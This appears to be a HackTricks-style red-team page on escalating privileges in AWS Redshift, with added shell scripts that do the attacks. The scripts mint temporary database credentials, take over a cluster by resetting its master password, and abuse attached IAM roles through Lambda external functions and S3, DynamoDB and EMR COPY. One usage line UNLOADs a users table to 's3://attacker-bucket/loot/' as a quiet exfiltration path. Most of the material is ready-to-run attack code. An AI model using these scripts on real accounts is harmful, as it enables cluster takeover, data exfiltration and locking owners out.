AWS - Redshift Privesc
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
For more information about Redshift check:
AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

With these permissions you can list every cluster (identifier, endpoint, master username, associated IAM roles) and then mint a temporary password for an existing database user with get-cluster-credentials (the returned DbUser is prefixed with IAM:; adding --auto-create creates the user if it does not exist yet). The password is only useful if you can reach the cluster endpoint (TCP 5439 by default), so check PubliclyAccessible and the security groups as well.
Potential Impact: Find sensitive info inside the databases.
redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

With these permissions you can list the clusters and get credentials with get-cluster-credentials-with-iam. No database user is chosen here: the temporary user is derived from the IAM identity making the call (IAM:<user> or IAMR:<role>) and has only the privileges that identity has been granted inside the cluster (plus PUBLIC), so the access you end up with depends on how the target mapped IAM identities to database permissions.
Potential Impact: Find sensitive info inside the databases.
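As an added example (not code from the original page), a small POSIX shell script that wraps both credential paths above: it lists the clusters, keeps the ones that are reachable from the internet or have IAM roles associated, mints a temporary password with get-cluster-credentials or get-cluster-credentials-with-iam and logs in with psql. Cluster identifiers, user names and the sample rows used to exercise the triage are constructed placeholders; the aws and psql flags are real.

```shell
#!/bin/sh
# redshift_creds.sh - enumerate Redshift clusters and log in with temporary
# credentials from GetClusterCredentials or GetClusterCredentialsWithIAM.
# Added example, not code from the original page; cluster names, user names
# and the sample rows used in the checks are constructed placeholders.
# Requires aws CLI v2, psql and network reachability to the cluster endpoint.

TAB="$(printf '\t')"

# One tab-separated row per cluster: id, master user, endpoint host, port, db,
# PubliclyAccessible (True/False), associated IAM role ARNs (comma separated).
enum_clusters() {
    aws redshift describe-clusters --output text --query \
      'Clusters[].[ClusterIdentifier,MasterUsername,Endpoint.Address,Endpoint.Port,DBName,PubliclyAccessible,join(`,`,IamRoles[].IamRoleArn)]'
}

# "<host>\t<port>" of one cluster.
cluster_endpoint() { # cluster
    aws redshift describe-clusters --cluster-identifier "$1" --output text \
      --query 'Clusters[0].[Endpoint.Address,Endpoint.Port]'
}

# First / second tab-separated field of a CLI text row.
field1() { printf '%s\n' "${1%%${TAB}*}"; }
field2() { printf '%s\n' "${1#*${TAB}}"; }

# Triage enum_clusters rows from stdin: keep clusters that are reachable from
# the internet or carry IAM roles (usable from SQL with IAM_ROLE '...'), and
# say why. Rows with neither property are dropped.
triage() {
    while IFS="$TAB" read -r id master host port db public roles; do
        why=""
        if [ "$public" = "True" ]; then why="${why}public-endpoint "; fi
        if [ -n "$roles" ] && [ "$roles" != "None" ]; then why="${why}iam-roles "; fi
        if [ -n "$why" ]; then
            printf '%s\t%s@%s:%s/%s\t%s\n' "$id" "$master" "$host" "$port" "$db" "${why% }"
        fi
    done
}

# redshift:GetClusterCredentials: temporary password for an existing database
# user (DbUser comes back as "IAM:<name>"; add --auto-create to create it).
creds_for_user() { # cluster db-user db
    aws redshift get-cluster-credentials --cluster-identifier "$1" --db-user "$2" \
      --db-name "$3" --duration-seconds 900 --query '[DbUser,DbPassword]' --output text
}

# redshift:GetClusterCredentialsWithIAM: no user to pick; the database user is
# derived from the caller (IAM:<user> or IAMR:<role>) and only has what that
# user was granted inside the cluster.
creds_for_caller() { # cluster db
    aws redshift get-cluster-credentials-with-iam --cluster-identifier "$1" \
      --db-name "$2" --duration-seconds 900 --query '[DbUser,DbPassword]' --output text
}

# Log in with a "<DbUser>\t<DbPassword>" row and list the visible user tables.
connect() { # host port db creds-row
    PGPASSWORD="$(field2 "$4")" psql -h "$1" -p "$2" -d "$3" -U "$(field1 "$4")" \
      -c 'select current_user, current_database(), version();' \
      -c "select schemaname, tablename from pg_tables where schemaname not in ('pg_catalog', 'information_schema', 'pg_internal');"
}

main() {
    case "${1:-}" in
        list) enum_clusters | triage ;;
        user) creds="$(creds_for_user "$2" "$3" "$4")"; ep="$(cluster_endpoint "$2")"
              connect "$(field1 "$ep")" "$(field2 "$ep")" "$4" "$creds" ;;
        iam)  creds="$(creds_for_caller "$2" "$3")"; ep="$(cluster_endpoint "$2")"
              connect "$(field1 "$ep")" "$(field2 "$ep")" "$3" "$creds" ;;
        *)    echo "usage: $0 list | user <cluster> <db-user> <db> | iam <cluster> <db>" >&2; return 2 ;;
    esac
}

# Only run when given arguments so the functions can also be sourced.
if [ $# -gt 0 ]; then main "$@"; fi
```

Run `./redshift_creds.sh list` first: a cluster with a public endpoint is the one you can reach from outside, and a cluster with roles in the last column is the one where the IAM_ROLE techniques further down this page pay off. `user` needs an existing database user name (MasterUsername from the listing works), `iam` needs none.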
redshift:DescribeClusters, redshift:ModifyCluster

The master user's password can be reset from the CLI with aws redshift modify-cluster --master-user-password, which is authorised by redshift:ModifyCluster; describe-clusters gives you the master username and the endpoint to log in with afterwards. Note that this overwrites the existing password, so the legitimate owner loses access and the ModifyCluster call is recorded in CloudTrail.
Potential Impact: Log in as the master (superuser) and find sensitive info inside the databases.
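Added example (not from the original page): the reset carried out as a shell script, with a local check of Redshift's master password rules before the noisy API call, followed by a login that confirms superuser status. The cluster identifier and password are placeholders; the aws flags and the pg_user query are real.

```shell
#!/bin/sh
# redshift_reset_master.sh - take over a cluster's master user by resetting its
# password with redshift:ModifyCluster. Added example, not code from the
# original page; cluster identifier and password are placeholders.
# Loud and destructive: the owner's master password stops working and the
# ModifyCluster call lands in CloudTrail, so only do it when that is acceptable.
export LC_ALL=C

# Redshift's master password rules: 8-64 printable ASCII characters, at least
# one upper-case letter, one lower-case letter and one digit, and none of
# ' " \ / @ or space. A violating password makes modify-cluster fail, so check
# locally before making the API call.
valid_master_password() {
    p="$1"
    if [ "${#p}" -lt 8 ] || [ "${#p}" -gt 64 ]; then return 1; fi
    case "$p" in *[A-Z]*) ;; *) return 1 ;; esac
    case "$p" in *[a-z]*) ;; *) return 1 ;; esac
    case "$p" in *[0-9]*) ;; *) return 1 ;; esac
    case "$p" in *"'"* | *'"'* | *'\'* | */* | *@*) return 1 ;; esac
    # anything left after deleting ASCII 33-126 is a space, control or non-ASCII byte
    if [ -n "$(printf '%s' "$p" | tr -d '!-~')" ]; then return 1; fi
    return 0
}

# Reset the password, wait until the cluster has applied it, and print the
# master username and endpoint you now own.
reset_master_password() { # cluster new-password
    if ! valid_master_password "$2"; then echo "password violates Redshift rules" >&2; return 1; fi
    aws redshift modify-cluster --cluster-identifier "$1" --master-user-password "$2" \
      --output text --query 'Cluster.[MasterUsername,Endpoint.Address,Endpoint.Port,DBName]'
    aws redshift wait cluster-available --cluster-identifier "$1"
}

# Log in as the master user and confirm it is a superuser.
login_as_master() { # cluster new-password
    pw="$2"
    set -- $(aws redshift describe-clusters --cluster-identifier "$1" --output text \
      --query 'Clusters[0].[MasterUsername,Endpoint.Address,Endpoint.Port,DBName]')
    PGPASSWORD="$pw" psql -h "$2" -p "$3" -d "$4" -U "$1" \
      -c 'select usename, usesuper from pg_user where usename = current_user;'
}

# Usage: ./redshift_reset_master.sh <cluster-identifier> <new-password>
if [ $# -eq 2 ]; then reset_master_password "$1" "$2" && login_as_master "$1" "$2"; fi
```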
All of the following techniques run inside the database and borrow an IAM role that is associated with the cluster. You can name the role by ARN (describe-clusters lists them under IamRoles) or write IAM_ROLE default to use the cluster's default role (DefaultIamRoleArn), so the associated roles are the thing to enumerate first.
Moreover, as explained in the Redshift documentation on chaining IAM roles, you can reach roles that are not associated with the cluster by listing a chain separated by commas (no spaces): the first role must be associated with the cluster and each following role must be assumable by the one before it, e.g. iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';
As explained in https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, CREATE EXTERNAL FUNCTION ... LAMBDA '<function-name>' IAM_ROLE '<arn>' registers a SQL function backed by a Lambda function; every call of it from a SELECT invokes that Lambda through the chosen role, so any function the role may invoke becomes reachable with arguments you control.
As explained in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, COPY ... FROM 's3://bucket/prefix' reads objects into a table and UNLOAD ('query') TO 's3://bucket/prefix' writes query results out, both with the role's S3 permissions: read buckets the role can read, exfiltrate data to buckets it can write.
As explained in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, COPY ... FROM 'dynamodb://<table>' pulls a whole DynamoDB table into Redshift (READRATIO is mandatory and sets how much of the table's read capacity to consume; only attributes whose names match the target table's columns are kept).
The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the REGION option to specify the AWS Region in which the Amazon DynamoDB table is located.
Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html: COPY can also read files straight out of an EMR cluster's HDFS ('emr://<cluster-id>/<path>'), but that only works once the EMR nodes have been configured to accept the Redshift cluster's public key and IP addresses.
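Added example for the whole section above (role selection and chaining, Lambda, S3, DynamoDB and EMR), not code from the original page: a shell script that builds each statement with a locally validated IAM_ROLE clause and feeds it to psql using a temporary password from get-cluster-credentials. Bucket, table, Lambda, role and cluster names are placeholders; the aws, psql and Redshift SQL syntax is real.

```shell
#!/bin/sh
# redshift_roles.sh - use the IAM roles associated with a Redshift cluster from
# inside SQL. Added example, not code from the original page: it builds the
# statements the page describes (Lambda external function, S3 COPY/UNLOAD,
# DynamoDB and EMR COPY) and pipes them into psql with a temporary password
# from get-cluster-credentials. Bucket, table, function, role and cluster
# names are placeholders; the aws, psql and Redshift SQL syntax is real.

TAB="$(printf '\t')"

# Roles usable from SQL: the cluster's default role (if any) and the
# associated roles, printed as "<default-arn>\t<arn>,<arn>,...".
attached_roles() { # cluster
    aws redshift describe-clusters --cluster-identifier "$1" --output text \
      --query 'Clusters[0].[DefaultIamRoleArn, join(`,`, IamRoles[].IamRoleArn)]'
}

# IAM_ROLE clause. "default" uses the cluster default role; otherwise one ARN
# or a comma-separated chain (first role associated with the cluster, each
# later role assumable by the one before it). Anything that is not a role ARN
# is rejected so a typo does not turn into a broken statement.
iam_role_clause() { # default | arn[,arn...]
    if [ "$1" = "default" ]; then printf 'IAM_ROLE default'; return 0; fi
    rest="$1,"
    while [ -n "$rest" ]; do
        arn="${rest%%,*}"; rest="${rest#*,}"
        case "$arn" in arn:aws*:iam::*:role/*) ;; *) echo "not a role ARN: $arn" >&2; return 1 ;; esac
    done
    printf "IAM_ROLE '%s'" "$1"
}

# Lambda: the role needs lambda:InvokeFunction on the target. Redshift sends a
# JSON batch holding our argument and expects a {"success", "results"} reply; a
# function that answers differently makes the SELECT fail, but by then it has
# already run with attacker-controlled input.
lambda_function_sql() { # sql-name lambda-name role-spec
    clause="$(iam_role_clause "$3")" || return 1
    printf "CREATE OR REPLACE EXTERNAL FUNCTION %s(varchar) RETURNS varchar VOLATILE LAMBDA '%s' %s;\nSELECT %s('probe');\n" \
      "$1" "$2" "$clause" "$1"
}

# S3: read objects the role can GetObject on into a table ...
s3_copy_sql() { # table s3-uri role-spec
    clause="$(iam_role_clause "$3")" || return 1
    printf "COPY %s FROM '%s' %s FORMAT AS CSV IGNOREHEADER 1;\n" "$1" "$2" "$clause"
}
# ... and write query results to a prefix the role can PutObject on.
s3_unload_sql() { # query s3-prefix role-spec
    clause="$(iam_role_clause "$3")" || return 1
    q="$(printf '%s' "$1" | sed "s/'/''/g")"   # UNLOAD takes the query as a string literal
    printf "UNLOAD ('%s') TO '%s' %s FORMAT AS CSV HEADER ALLOWOVERWRITE PARALLEL OFF;\n" "$q" "$2" "$clause"
}

# DynamoDB: READRATIO is mandatory; the target table's columns must be named
# like the item attributes, everything else is dropped.
dynamodb_copy_sql() { # table dynamodb-table region role-spec
    clause="$(iam_role_clause "$4")" || return 1
    printf "COPY %s FROM 'dynamodb://%s' %s READRATIO 25 REGION '%s';\n" "$1" "$2" "$clause" "$3"
}

# EMR: reads HDFS files directly; only works once the EMR nodes accept the
# Redshift cluster's public key and IP addresses (see the linked doc).
emr_copy_sql() { # table emr-cluster-id hdfs-path role-spec
    clause="$(iam_role_clause "$4")" || return 1
    printf "COPY %s FROM 'emr://%s/%s' %s DELIMITER '%s';\n" "$1" "$2" "$3" "$clause" '\t'
}

# Run the SQL on stdin against a cluster with a temporary password for an
# existing database user (requires redshift:GetClusterCredentials).
run_sql() { # cluster db-user db
    creds="$(aws redshift get-cluster-credentials --cluster-identifier "$1" \
      --db-user "$2" --db-name "$3" --query '[DbUser,DbPassword]' --output text)"
    ep="$(aws redshift describe-clusters --cluster-identifier "$1" --output text \
      --query 'Clusters[0].[Endpoint.Address,Endpoint.Port]')"
    PGPASSWORD="${creds#*${TAB}}" psql -h "${ep%%${TAB}*}" -p "${ep#*${TAB}}" \
      -d "$3" -U "${creds%%${TAB}*}" -v ON_ERROR_STOP=1
}

# Usage: source this file, then e.g.
#   attached_roles my-cluster
#   s3_unload_sql 'select * from users' 's3://attacker-bucket/loot/' default | run_sql my-cluster awsuser dev
if [ $# -eq 3 ]; then run_sql "$@"; fi
```

Start with attached_roles: whatever is in that output (or can be chained from it) is the blast radius of the SQL access you already have. UNLOAD is the quiet exfiltration path because the write goes from Redshift to S3 without the data ever crossing your connection; COPY from S3 or DynamoDB is the read path and needs a target table whose columns fit the data.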